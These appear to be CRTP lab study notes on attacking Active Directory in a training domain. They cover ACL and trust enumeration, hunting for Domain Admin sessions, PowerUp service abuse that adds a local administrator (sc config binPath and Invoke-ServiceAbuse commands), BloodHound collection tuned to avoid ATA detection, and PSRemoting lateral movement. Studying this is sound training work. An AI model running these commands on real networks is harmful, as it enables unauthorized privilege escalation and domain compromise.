whencreated : 2/19/2019 7:04:25 AM
versionnumber : 8
instancetype : 4
objectguid : 8ecdfe44-b617-4b9e-a9f9-4d548e5dc7b1
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
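Added example (not from the original notes): resolving OU-to-GPO links for the whole domain at once by parsing the gPLink attribute shown in the OU output above, instead of copying one GUID at a time into Get-NetGPO -GPOname. The function name is my own; the gPLink format ("[LDAP://<GPO DN>;<options>]" entries, option bit 1 = link disabled, bit 2 = enforced) is the documented one.

```powershell
# Added example: map each OU to its linked GPOs by parsing gPLink, as any domain user.

function Get-OUGpoLinks {
    $domainDN = ([ADSI]'LDAP://RootDSE').Properties['defaultNamingContext'].Value
    $searcher = New-Object System.DirectoryServices.DirectorySearcher("LDAP://$domainDN")
    $searcher.Filter = '(objectClass=organizationalUnit)'
    $searcher.PropertiesToLoad.AddRange([string[]]@('distinguishedname', 'gplink'))

    foreach ($ou in $searcher.FindAll()) {
        $gpLink = if ($ou.Properties['gplink'].Count) { $ou.Properties['gplink'][0] } else { '' }
        # Each link: [LDAP://CN={GUID},CN=Policies,CN=System,DC=...;<options>]
        foreach ($m in [regex]::Matches($gpLink, '\[LDAP://(?<dn>[^;]+);(?<opt>\d+)\]')) {
            $gpo  = [ADSI]"LDAP://$($m.Groups['dn'].Value)"
            $opts = [int]$m.Groups['opt'].Value
            [PSCustomObject]@{
                OU          = $ou.Properties['distinguishedname'][0]
                GPO         = $gpo.Properties['displayName'].Value
                GPOGuid     = $gpo.Properties['name'].Value
                LinkEnabled = -not ($opts -band 1)      # bit 1 set = link disabled
                Enforced    = [bool]($opts -band 2)     # bit 2 set = enforced (no override)
                SysvolPath  = $gpo.Properties['gPCFileSysPath'].Value   # where the policy files live
            }
        }
    }
}

Get-OUGpoLinks | Format-Table -AutoSize
```

The SysvolPath column is the interesting one for an attacker: every domain user can read those folders, so scripts, Group Policy Preferences XML and Restricted Groups settings can be inspected directly from the share.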

Access Control List Model ( ACL )

1. Access Token

a. Security context of a process

b. Identity and privileges of the user

2. Security Descriptor

a. SID of the owner

b. Discretionary ACL ( DACL ) → defines the permissions trustees ( users, groups ) have on an object

c. System ACL ( SACL ) → defines which accesses to the object generate success/failure audit events

Note: every object has a security descriptor.

DACL & SACL → consist of Access Control Entries [ ACE ]

ACE → an individual permission or audit entry: who has a permission and what can be done on an object?

DACL & SACL → both matter to an attacker. The DACL is the interesting one, because it is what grants rights that can be abused; the SACL decides what gets audited, so changes you make to objects may be logged.

Get the ACLs associated with the specified object:

Get-ObjectACL -SamAccountName <userName> -ResolveGUIDs

# -ResolveGUIDs resolves the schema and extended-rights GUIDs in ObjectType / InheritedObjectType to readable names ( e.g. User-Change-Password ) instead of raw GUIDs.

Get-ObjectACL -SamAccountName student181 -ResolveGUIDs

InheritedObjectType : All


ObjectDN : CN=student190,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : User-Change-Password -> resolved extended right ( thanks to -ResolveGUIDs )
IdentityReference : Everyone -> who the ACE applies to
IsInherited : False
ActiveDirectoryRights : ExtendedRight -> what can be done
PropagationFlags : None
ObjectFlags : ObjectAceTypePresent
InheritanceFlags : None
InheritanceType : None
AccessControlType : Deny -> this ACE denies the right
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-49160

InheritedObjectType : All
ObjectDN : CN=student190,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : All
IdentityReference : BUILTIN\Administrators
IsInherited : True
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : ContainerInherit
InheritanceType : All

AccessControlType : Allow
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-49160

Each block of information is one ACE.

There are 4 interesting properties to check in the results:

ObjectDN (Object Distinguished Name) is the object the ACE applies to, here the student user.

IdentityReference is who has access to the object. As seen above, the built-in Administrators group has access to the student object.

ActiveDirectoryRights are the types of permissions given on the object. In the example, the built-in Administrators group has WriteDacl and WriteOwner on the student object.

AccessControlType is Allow ( an ACE can also be Deny ).

WriteOwner lets the trustee change the object's owner, and the owner can always rewrite the DACL, so it amounts to full control over the student object. WriteDacl is the right to modify the object's DACL directly.

Other interesting rights to look for when enumerating Active Directory ACLs are GenericAll, GenericWrite, WriteOwner, WriteDacl, AllExtendedRights ( which includes User-Force-Change-Password ) and Self ( self-membership on groups ).

To filter on a specific type of permission, use the equal (-eq) operator and pass it the permission type such as "GenericAll" ( note that -eq only matches ACEs whose rights are exactly GenericAll; use -match to also catch combined flag values ):

Get-ObjectAcl student181 | Where-Object ActiveDirectoryRights -eq "GenericAll"

Get-ObjectAcl student181 | select IdentityReference, ActiveDirectoryRights | Where-Object ActiveDirectoryRights -eq "GenericAll"

shows the principals who have GenericAll ( full control ) permissions on the student181 object.
Get the ACLs associated with the specified ADS prefix ( used to build the search base ):

Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose

Run Get-ObjectACL with the ADSPrefix parameter to search for the access entries of specific containers using common names [CN], organizational units [OU] or domain components [DC]. In the example below, the search is for the access entries of the StudentMachines organizational unit:

Get-ObjectAcl -ADSprefix 'OU=StudentMachines' -Verbose

The ADSPath of any object is shown in the adspath property of the Get-Net* -FullData output above.

Get ACLs associated with a UNC path

Access controls of network shares, such as the SYSVOL share that holds group policy files and scripts, can be listed using the share's UNC path.

UNC → the Universal Naming Convention is the naming system used in Microsoft Windows for accessing shared network folders and printers on a local area network.

Syntax of a UNC path → \\host-name\share-name\file_path

Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"

Get the ACLs associated with a specified LDAP path:

Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose

InheritedObjectType : All
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : All
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False
ActiveDirectoryRights : GenericRead
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-512 -> RID 512 = Domain Admins

Search for interesting ACEs ( rights held by principals that are not high-privileged by default ):

Invoke-ACLScanner -ResolveGUIDs

InheritedObjectType : All
ObjectDN : CN=Support179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local -> the user object the ACE applies to
ObjectType : All
IdentityReference : dcorp\RDPUsers -> the RDPUsers group holds the right
IsInherited : False
ActiveDirectoryRights : GenericAll -> full control over the user ( e.g. reset its password )
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-49134
IdentitySID : S-1-5-21-1874506631-3219952063-538504511-1116

Check Lab 3 for Invoke-ACLScanner.
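Added example (not from the original notes): a stripped-down equivalent of Invoke-ACLScanner written against .NET DirectoryEntry.ObjectSecurity. It returns Allow ACEs that grant abusable rights to principals that are not already high-privileged, which is the same filtering idea as the output above (RDPUsers with GenericAll over a user). The ignored-principal list and the choice of interesting rights are assumptions to tune per environment; the extended-right and attribute GUIDs are the documented AD values; the function name is my own.

```powershell
# Added example: scan DACLs under a base DN for abusable rights held by low-privilege principals.
# Assumes a domain user context; reading nTSecurityDescriptor (DACL part) needs no special rights.

function Find-InterestingAces {
    param(
        [string]$BaseDN = ([ADSI]'LDAP://RootDSE').Properties['defaultNamingContext'].Value,
        # Assumed noise list: rights held by these principals are expected, not findings
        [string[]]$IgnorePrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'Domain Admins',
                                        'Enterprise Admins', 'CREATOR OWNER', 'Domain Controllers')
    )
    $abusable       = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, ExtendedRight, Self'
    $fullControlish = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner'
    # Documented rights/attribute GUIDs worth flagging when an ACE is scoped to a single one
    $knownGuids = @{
        '00000000-0000-0000-0000-000000000000' = 'All'
        '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
        'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'Self-Membership (member attribute)'
    }

    $searcher = New-Object System.DirectoryServices.DirectorySearcher("LDAP://$BaseDN")
    $searcher.Filter   = '(|(objectClass=user)(objectClass=group)(objectClass=computer)(objectClass=organizationalUnit)(objectClass=domainDNS))'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.Add('distinguishedname')

    foreach ($result in $searcher.FindAll()) {
        $entry = $result.GetDirectoryEntry()
        # Explicit + inherited ACEs; identities as SIDs so unresolvable ones do not throw
        $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($ace in $rules) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ([int]($ace.ActiveDirectoryRights -band $abusable) -eq 0) { continue }

            $guid   = $ace.ObjectType.ToString()
            $isFull = [int]($ace.ActiveDirectoryRights -band $fullControlish) -ne 0
            # A WriteProperty/ExtendedRight scoped to an unknown single attribute is usually noise
            if (-not $isFull -and -not $knownGuids.ContainsKey($guid)) { continue }

            $sid = $ace.IdentityReference
            $who = try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $sid.Value }
            if ($IgnorePrincipals | Where-Object { $who -like "*$_*" }) { continue }

            [PSCustomObject]@{
                ObjectDN   = $result.Properties['distinguishedname'][0]
                Identity   = $who
                Rights     = $ace.ActiveDirectoryRights
                ObjectType = if ($knownGuids.ContainsKey($guid)) { $knownGuids[$guid] } else { $guid }
                Inherited  = $ace.IsInherited
            }
        }
    }
}

Find-InterestingAces | Format-Table -AutoSize
```

Cross-check any hit against the groups you actually belong to (Get-NetGroup -UserName above): an ACE for a group you are in, or for Authenticated Users / Everyone, is directly usable, while one for an unrelated group is a lateral-movement target, not a current capability.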

Trusts
Trust → a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest.
Each trust is represented by a Trusted Domain Object ( TDO ).

TDO → every domain that a domain trusts is represented by a TDO stored in the System container of the trusting domain.

Active Directory follows a clear hierarchy, from top to bottom: forests, trees and domains.

1. Forest → represents the complete Active Directory instance; a logical container made up of

a. Domain trees

b. Domains

c. Organizational units

2. Trees → collections of domains that share a contiguous DNS namespace; these include child domains.

3. Domains → a logical grouping of network objects such as computers, users, applications and devices on the network such as printers.
Active Directory Trust:

In simplest terms, it is the process of extending the security boundary of an AD domain or forest to include another AD domain or forest.

Trust Direction:
1. One-way trust ( unidirectional ) → users in the trusted domain can access resources in the trusting domain, but the reverse is not true. ( I trust you, but you don't trust me )

In the diagram, the domain on the left lets the domain on the right access its resources, but the reverse is not allowed.

2. Two-way ( bidirectional ) → users of both domains can access resources in the other domain.

Domain 2 has a one-way trust to Domain 1. That means principals in Domain 1 ( the trusted domain ) are permitted to access the resources of Domain 2 ( the trusting domain ), but not vice versa ( Domain 2 cannot access Domain 1 ).

Trust Transitivity:

Transitive Trust:
Can be extended to establish trust relationships with other domains.

All the default intra-forest trust relationships ( tree-root, parent-child ) between domains within the same forest are transitive two-way trusts.

What are intra-forest and inter-forest?

Intra-forest: between domains of the same forest ( e.g. an intra-forest migration ).

Inter-forest: between domains of different forests ( e.g. an inter-forest migration ).

In the diagram, "Forest 1" has a transitive two-way trust with "Forest 2", which means that all domains within "Forest 1" are accessible to "Forest 2" and the other way around. The same applies inside the forests, on the tree-root and parent-child levels.

Non-Transitive Trust:
Cannot be extended to other domains in the forest. Can be two-way or one-way.

This is the default trust ( called an external trust ) between two domains in different forests when the forests themselves do not have a trust relationship. → this is between domains in different forests.

The diagram shows a one-way external trust between "Domain 2" in "Forest 2" and "Forest 1". The arrowhead indicates the access direction. In this case, Forest 1 users have access to Domain 2 in Forest 2 only. Domain 2 in Forest 2 has NO access to Forest 1.

Here the relationship is not with the whole forest, only with Domain 2.

Trusts can be created using the New Trust Wizard found in the Active Directory Domains and Trusts console, or using the Netdom command line utility.

Trust Types:
1. Parent/Child trust

2. Tree/Root trust

3. Shortcut trust

4. Forest trust

5. Realm trust

6. External trust

Crtp-Report-Exam

Trust Types (1)

Trust Type   | Characteristics               | Direction          | Authentication Mechanism | Notes
-------------|-------------------------------|--------------------|--------------------------|-------------------------------------------------------------------------------
Parent-Child | Transitive                    | Two-way            | Kerberos V5 or NTLM      | Created automatically when a child domain is added.
Tree-Root    | Transitive                    | Two-way            | Kerberos V5 or NTLM      | Created automatically when a new tree is added to a forest.
Shortcut     | Transitive                    | One-way or two-way | Kerberos V5 or NTLM      | Created manually. Used in an AD DS forest to shorten the trust path to improve authentication times.
Forest       | Transitive                    | One-way or two-way | Kerberos V5 or NTLM      | Created manually. Used to share resources between AD DS forests.
External     | Non-transitive                | One-way or two-way | NTLM only                | Created manually. Used to access resources in an NT 4.0 domain or a domain in another forest that does not have a forest trust established.
Realm        | Transitive or non-transitive  | One-way or two-way | Kerberos V5 only         | Created manually. Used to access resources between a non-Windows Kerberos V5 realm and an AD DS domain.

Parent-Cild

They can only exist between two domains in the same tree with the same contiguous
namespace. The parent domain is always trusted by the child domain. You cannot
manually create a Parent-Child trust.

Tree-Root

A tree-root trust can only be established between the roots of two trees in the
same forest and is always transitive. You cannot manually create a tree-root
trust.

Shortcut

Manually created, one-way, transitive trusts. They can only exist within a forest.
They are created to optimize the authentication process by shortening the trust path.

Shortcut trusts shorten the trust path.
Forest Trust

Manually created, one-way transitive or two-way transitive trusts that allow you
to provide access to resources between multiple forests.

Forest trusts use both Kerberos v5 and NTLM authentication across forests, where
users can use their User Principal Name (UPN) or their Pre-Windows 2000
method (domainName\username). Kerberos v5 is attempted first, and if that fails,
it will then try NTLM.

Forest trusts require DNS resolution to be established between forests.

Forest trusts cannot be extended to other forests: if Forest 1 trusts
Forest 2, and another forest trust is created between Forest 2 and Forest 3,
Forest 1 does not have an implied trust to Forest 3. If a trust is required, one must be
manually created.

External Trust

One-way or two-way, non-transitive trust that is manually created to establish a
trust relationship between AD DS domains that are in different forests, or between
an AD DS domain and a Windows NT 4.0 domain.

External trusts allow you to provide users access to resources in a domain outside
of the forest that is not already trusted by a forest trust.

External trusts are NTLM based, meaning users must authenticate using the Pre-
Windows 2000 logon method (domain\username). NTLM requires NetBIOS name resolution
support for functionality.

Realm Trust

Trust relationships with other operating systems that also support the Kerberos
protocol.

One-way transitive or two-way transitive → uses Kerberos authentication only.

A Realm trust can be established to provide resource access and cross-platform
inter-operability between an AD DS domain and a non-Windows Kerberos v5 realm.
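Added example (not from the notes): a small model of the trust rules in the table above, used to work out which domains an account can reach. The forests, domains and trusts below are constructed for the example, and the model simplifies the rules to intra-forest transitivity, non-chaining forest trusts and domain-bounded external trusts.

```powershell
# Added example, not from the CRTP notes: a small model of the trust rules in the
# table above, used to work out which domains an account can reach.
# Rules modelled (simplified from the table):
#  - Every domain in a forest can reach every other domain in that forest
#    (parent/child and tree-root trusts are automatic, two-way and transitive).
#  - A forest trust makes every domain of the trusting forest reachable by every
#    domain of the trusted forest; forest trusts do not chain to a third forest.
#  - An external trust is non-transitive: it reaches exactly one trusting domain.
# The topology below is constructed for the example (names are made up).
$Forests = @{
    'Forest1' = @('corp.local', 'dev.corp.local')
    'Forest2' = @('partner.local', 'eu.partner.local')
    'Forest3' = @('vendor.local')
}
# Each trust: the Trusting side grants access to accounts from the Trusted side.
$Trusts = @(
    [pscustomobject]@{ Type = 'Forest';   Trusting = 'Forest2';      Trusted = 'Forest1' }
    [pscustomobject]@{ Type = 'Forest';   Trusting = 'Forest3';      Trusted = 'Forest2' }
    [pscustomobject]@{ Type = 'External'; Trusting = 'vendor.local'; Trusted = 'dev.corp.local' }
)

function Get-ForestOfDomain {
    param([Parameter(Mandatory)][string]$Domain)
    foreach ($f in $Forests.Keys) {
        if ($Forests[$f] -contains $Domain) { return $f }
    }
    throw "Unknown domain: $Domain"
}

function Get-ReachableDomains {
    param([Parameter(Mandatory)][string]$AccountDomain)
    $homeForest = Get-ForestOfDomain -Domain $AccountDomain
    $reach = New-Object 'System.Collections.Generic.HashSet[string]'
    # Intra-forest: the automatic transitive trusts cover the whole forest.
    foreach ($d in $Forests[$homeForest]) { [void]$reach.Add($d) }
    foreach ($t in $Trusts) {
        switch ($t.Type) {
            'Forest' {
                # Only a forest trust whose Trusted side is the account's own forest
                # counts; Forest3 trusting Forest2 says nothing about Forest1 accounts.
                if ($t.Trusted -eq $homeForest) {
                    foreach ($d in $Forests[$t.Trusting]) { [void]$reach.Add($d) }
                }
            }
            'External' {
                # Non-transitive and bounded to the two domains named in the trust.
                if ($t.Trusted -eq $AccountDomain) { [void]$reach.Add($t.Trusting) }
            }
        }
    }
    return @($reach | Sort-Object)
}

# corp.local accounts reach both Forest2 domains but nothing in Forest3.
Get-ReachableDomains -AccountDomain 'corp.local'
# dev.corp.local accounts additionally reach vendor.local through the external
# trust; corp.local accounts do not, because that trust is bounded to dev.corp.local.
Get-ReachableDomains -AccountDomain 'dev.corp.local'
```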

Get Forest Details

Get-NetForest -> Get information for the current forest.

Get-NetForest -Forest <ForestName>

The command returns the current forest name “moneycorp.local”
and the available domains within the forest (moneycorp.local,
dollarcorp.moneycorp.local, and us.dollarcorp.moneycorp.local).

Domain Trust Mapping

Get-NetDomainTrust -> get available trusts within the current or any other trusted domain in the same or an external forest.
Get-NetDomainTrust -Domain <DomainName>

The existing domain “dollarcorp.moneycorp.local” has 3 trust relationships:

Transitive, 2-way trust with its forest “moneycorp.local”

Transitive, 2-way trust with its child domain “us.dollarcorp.moneycorp.local”

External 2-way trust with another forest called “eurocorp.local”

Get-NetForest -Forest eurocorp.local

RootDomainSid : -
Name : eurocorp.local -> External Forest
Sites : {Default-First-Site-Name}
Domains : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local, DC=ForestDnsZones,DC=eurocorp,DC=local, DC=Doma
ForestModeLevel : 7
ForestMode : Unknown
RootDomain : eurocorp.local
Schema : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner : eurocorp-dc.eurocorp.local
NamingRoleOwner : eurocorp-dc.eurocorp.local

Get Domain Structure

To get the structure and hierarchy of the domains within the current or a
specified forest:

Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>

The above result shows that within our forest, moneycorp.local is the root domain
(because it doesn’t have any parent domain) and its child domain is
dollarcorp.moneycorp.local.

Also, the “us.dollarcorp.moneycorp.local” domain is a child of the
dollarcorp.moneycorp.local domain.

moneycorp.local → dollarcorp.moneycorp.local →
us.dollarcorp.moneycorp.local

User Hunting

On the foothold machine I’ll check whether the current user has local admin access on any other machine
in the domain → it’s very important to check that with Find-LocalAdminAccess.

Find all machines on the current domain where the current user has local admin access:

Find-LocalAdminAccess -Verbose

Internally it works like this:

Get-NetComputer | Invoke-CheckLocalAdminAccess

Look at the figure below; it works like this:

Sometimes there is an issue when the ports used by Find-LocalAdminAccess (RPC and SMB)
are blocked, so I’ll use Find-WMILocalAdminAccess.ps1 to do the same check over WMI:

PS C:\AD\Tools> Find-WMILocalAdminAccess

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA544
Version : 10.0.14393

The current user has Local Admin access on: dcorp-adminsrv.dollarcorp.moneycorp.local -> dcorp-adminsrv ( Other Machine )
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA549
Version : 10.0.14393

The current user has Local Admin access on: dcorp-std181.dollarcorp.moneycorp.local -> dcorp-std181 ( My Machine )
WARNING: Something went wrong. Check the settings, confirm hostname etc, The RPC server is unavailable. (Exception from HRESULT: 0x

Find local admins on all machines of the domain (needs Administrator privs on non-DC
machines):

Invoke-EnumerateLocalAdmin -Verbose

Internally it works like this:

Get-NetComputer | Get-NetLocalGroup

Find computers where a domain admin (or a specified user/group) has sessions.

This is the easiest way to escalate to Domain Admin:

Look for a machine where a Domain Admin token, credential or session is available and
where we have local admin on that machine.
If I have that, I will extract the Domain Admin credentials and escalate my privileges.

Invoke-UserHunter -> Looks for sessions of domain admins on all machines in the domain and checks whether the current user has local admin access there.
Invoke-UserHunter -GroupName "RDPUsers"

Internally Invoke-UserHunter works like this:

Get-NetComputer | Get-NetSession

Invoke-UserHunter

Confirm admin access :

Invoke-UserHunter -CheckAccess

Invoke-UserHunter -Stealth -> Find Computer where a domain admin is logged-in -> chance of success is lower

Privilege escalation - Local

There are various ways of locally escalating privileges on a Windows box:

Missing patches.

Automated deployment and AutoLogon password in cleartext. → AutoLogon credentials are stored in the Windows
registry in cleartext.

AlwaysInstallElevated (any user can run MSI as SYSTEM).

Misconfigured services. → Unquoted service path, permissions on the service itself.

DLL hijacking and more.

Tools:
PowerUp
BeRoot

Privesc

Service issues using PowerUp:

Get services with unquoted paths and a space in their name.

Get-ServiceUnquoted -Verbose

What is an Unquoted Service Path?

If I have a service installed at: C:\FTPServer\FTP Server\Filezilla\Filezilla.exe

you can see there is a space in "FTP Server" → that means I can put a file
like this:
C:\FTPServer\FTP.exe → and after restarting the Filezilla service, FTP.exe will be executed.

How to prevent an Unquoted Service Path:

Just quote the path: “C:\FTPServer\FTP Server\Filezilla\Filezilla.exe”

Get-WmiObject -Class win32_service | select PathName -> Get the path name of all services on the current machine
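Added example (not from the notes or from PowerUp): an audit that lists services with an unquoted, space-containing ImagePath, the shorter executables the service control manager would try first, and which of those directories a low-privileged principal can write to; with -Fix it quotes the executable in the registry, which is the prevention described above. The candidate-path logic is a separate function so it can be tried offline on the Filezilla path from the notes; the service-wide scan assumes an elevated PowerShell on the host being audited.

```powershell
function Get-UnquotedPathCandidates {
    # Pure string logic, so it can be tried offline on any PathName value.
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }                 # already quoted
    # The executable ends at the first ".exe"; whatever follows is arguments.
    $m = [regex]::Match($PathName, '^(?<exe>.+?\.exe)(?<rest>.*)$', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $exe = $m.Groups['exe'].Value
    if ($exe -notmatch ' ') { return @() }                        # space only in the arguments
    # Each space in the binary path yields one shorter executable the service control
    # manager tries first, e.g. C:\FTPServer\FTP.exe for the Filezilla path in the notes.
    $parts = $exe -split ' '
    $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
    return @($candidates)
}

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param([switch]$Fix)
    $lowPriv   = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone'
    $writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $candidates = @(Get-UnquotedPathCandidates -PathName $svc.PathName)
        if ($candidates.Count -eq 0) { continue }
        # A candidate directory writable by a low-privileged principal is the finding
        # (the same condition PowerUp reports as ModifiablePath).
        $writable = foreach ($c in $candidates) {
            $dir = Split-Path -Path $c -Parent
            if (-not (Test-Path -LiteralPath $dir)) { continue }
            $hit = (Get-Acl -LiteralPath $dir).Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $lowPriv -contains $_.IdentityReference.Value -and
                ([int]($_.FileSystemRights -band $writeBits)) -ne 0
            }
            if ($hit) { $dir }
        }
        [pscustomobject]@{
            Name         = $svc.Name
            RunsAs       = $svc.StartName
            PathName     = $svc.PathName
            Candidates   = $candidates
            WritableDirs = @($writable | Select-Object -Unique)
        }
        if ($Fix) {
            # Quote only the executable; the service arguments stay outside the quotes.
            $m = [regex]::Match($svc.PathName, '^(?<exe>.+?\.exe)(?<rest>.*)$', 'IgnoreCase')
            $fixed = '"{0}"{1}' -f $m.Groups['exe'].Value, $m.Groups['rest'].Value
            Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" `
                -Name ImagePath -Value $fixed
        }
    }
}

# Offline check against the path used in the notes:
Get-UnquotedPathCandidates -PathName 'C:\FTPServer\FTP Server\Filezilla\Filezilla.exe'
# Full audit of the local host (add -Fix to quote the offending paths):
Get-UnquotedServicePath | Format-List
```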

By PowerUp.ps1

#1 Unquoted Service Paths

Invoke-AllChecks
#OR
Get-ServiceUnquoted -Verbose

#Abuse
Write-ServiceBinary -Name 'AbyssWebServer' -Path C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"

#Restart Service
sc stop AbyssWebServer
sc start AbyssWebServer

#2 Modify Service Executable

Replaces the service binary for the specified service with one that executes a specified
command as SYSTEM.
Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the
current user can modify the associated service binary listed in the binPath. Backs up
the original service binary to "OriginalService.exe.bak" in service binary location, and
then uses Write-ServiceBinary to create a C# service binary that either adds a local
administrator user or executes a custom command. The new service binary is replaced in
the original service binary path, and a custom object is returned that captures the
original and new service binary configuration.

Invoke-AllChecks
#OR
Get-ModifiableServiceFile -Verbose -> Get services where the current user can overwrite the binary path or change the args

Why is the second one not vulnerable to the unquoted path issue? Because the space is in Program Files (x86), and
you need administrator privileges to overwrite those files :).

#Abuse
Install-ServiceBinary -Name "AbyssWebServer" -Command "net localgroup administrators user /add"

# Manual
Write-ServiceBinary -Name 'AbyssWebServer' -Command "command" -Path "C:\WebServer\Abyss.exe"

#3 Modify Service BinPath


Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the
current user has configuration modification rights on and executes a series of automated
actions to execute commands as SYSTEM. First, the service is enabled if it was set as
disabled and the original service binary path and configuration state are preserved.
Then the service is stopped and the Set-ServiceBinPath function is used to set the
binary (binPath) for the service to a series of commands, the service is started,
stopped, and the next command is configured. After completion, the original service
configuration is restored and a custom object is returned that captures the service
abused and commands run.

# Enumeration
Invoke-AllChecks
#OR
Get-ModifiableService -Verbose -> Modify the service itself and temporarily make it point to another executable

# Abuse
Invoke-ServiceAbuse -Name "AbyssWebServer" -Command "net localgroup administrators user /add"
# Manual
sc config "servicename" binPath= "cmd.exe /c net localgroup Administrators user /add"
sc stop "servicename"
sc start "servicename"

Invoke-AllChecks
Invoke-AllChecks is a function that runs all the checks included in the module. The
function outputs results of the checks in a useful format and offers us suggestions for
where to look regarding privilege escalation.

Path 1: Unquoted Paths

Looking at our results from Invoke-AllChecks we can see a check for unquoted service
paths has found the following:

Invoke-AllChecks -> PowerUp.ps1

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True

This can change the path of the service: we can make the AbyssWebServer service point to
a new executable like cmd.exe or powershell.exe, and we can restart this service.

BloodHound
Maps trusts, other objects and the relationships between all objects and entities using data
collected by an ingestor. ( it’s not that useful for a RedTeamer, it’s useful for PT or
BlueTeamer ).

. .\SharpHound.ps1 -> This is called the ingestor

Invoke-BloodHound -CollectionMethod All

#OR
Invoke-BloodHound -CollectionMethod All -Domain <Domain> -ZipFilename <zipName>

To avoid detection like ATA ( The Advanced-Threat-Analytics PowerShell module was designed to make it easy for customers to interfa
# Invoke-BloodHound -CollectionMethod All -ExcludeDC

After generating the zip file, run the neo4j and BloodHound servers and also transfer the
zip file to the attacker machine with pscp.

#Install putty tools for pscp


sudo apt install putty-tools

# PSCP command
pscp <username>@<ip_of_target-Machine>:/<Directory_Of_file> <Destination>

#neo4j
neo4j.bat -install-service

now run bloodhound.exe

Invoke-BloodHound -CollectionMethod LoggedOn -> For sessions

Lateral Movement - PowerShell Remoting ( psexec )
Admin Recon → Lateral Movement → Domain Admin Priv
Need to enable remoting ( Enable-PSRemoting ) on desktop Windows machines. Admin privileges
are required to do that.
PowerShell Remoting uses TCP/5985 (HTTP) by default, and 5956 for SSL.

Two types of PowerShell Remoting:

1. One-To-One

a. Interactive login to another machine, works over a session called ( PSSession )

b. PSSession

i. Interactive

ii. Runs in a new process ( wsmprovhost )

iii. Is stateful.

c. Cmdlets:

i. New-PSSession

ii. Enter-PSSession

# First Find-LocalAdminAccess
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> Find-LocalAdminAccess
dcorp-adminsrv.dollarcorp.moneycorp.local

#Second Use PSSession To Enter a machine


Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Store a session:

$sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

$sess

When a session is created it is not killed every time; it is
stateful.

2. One-To-Many

a. Send multiple commands from a single machine to many machines.

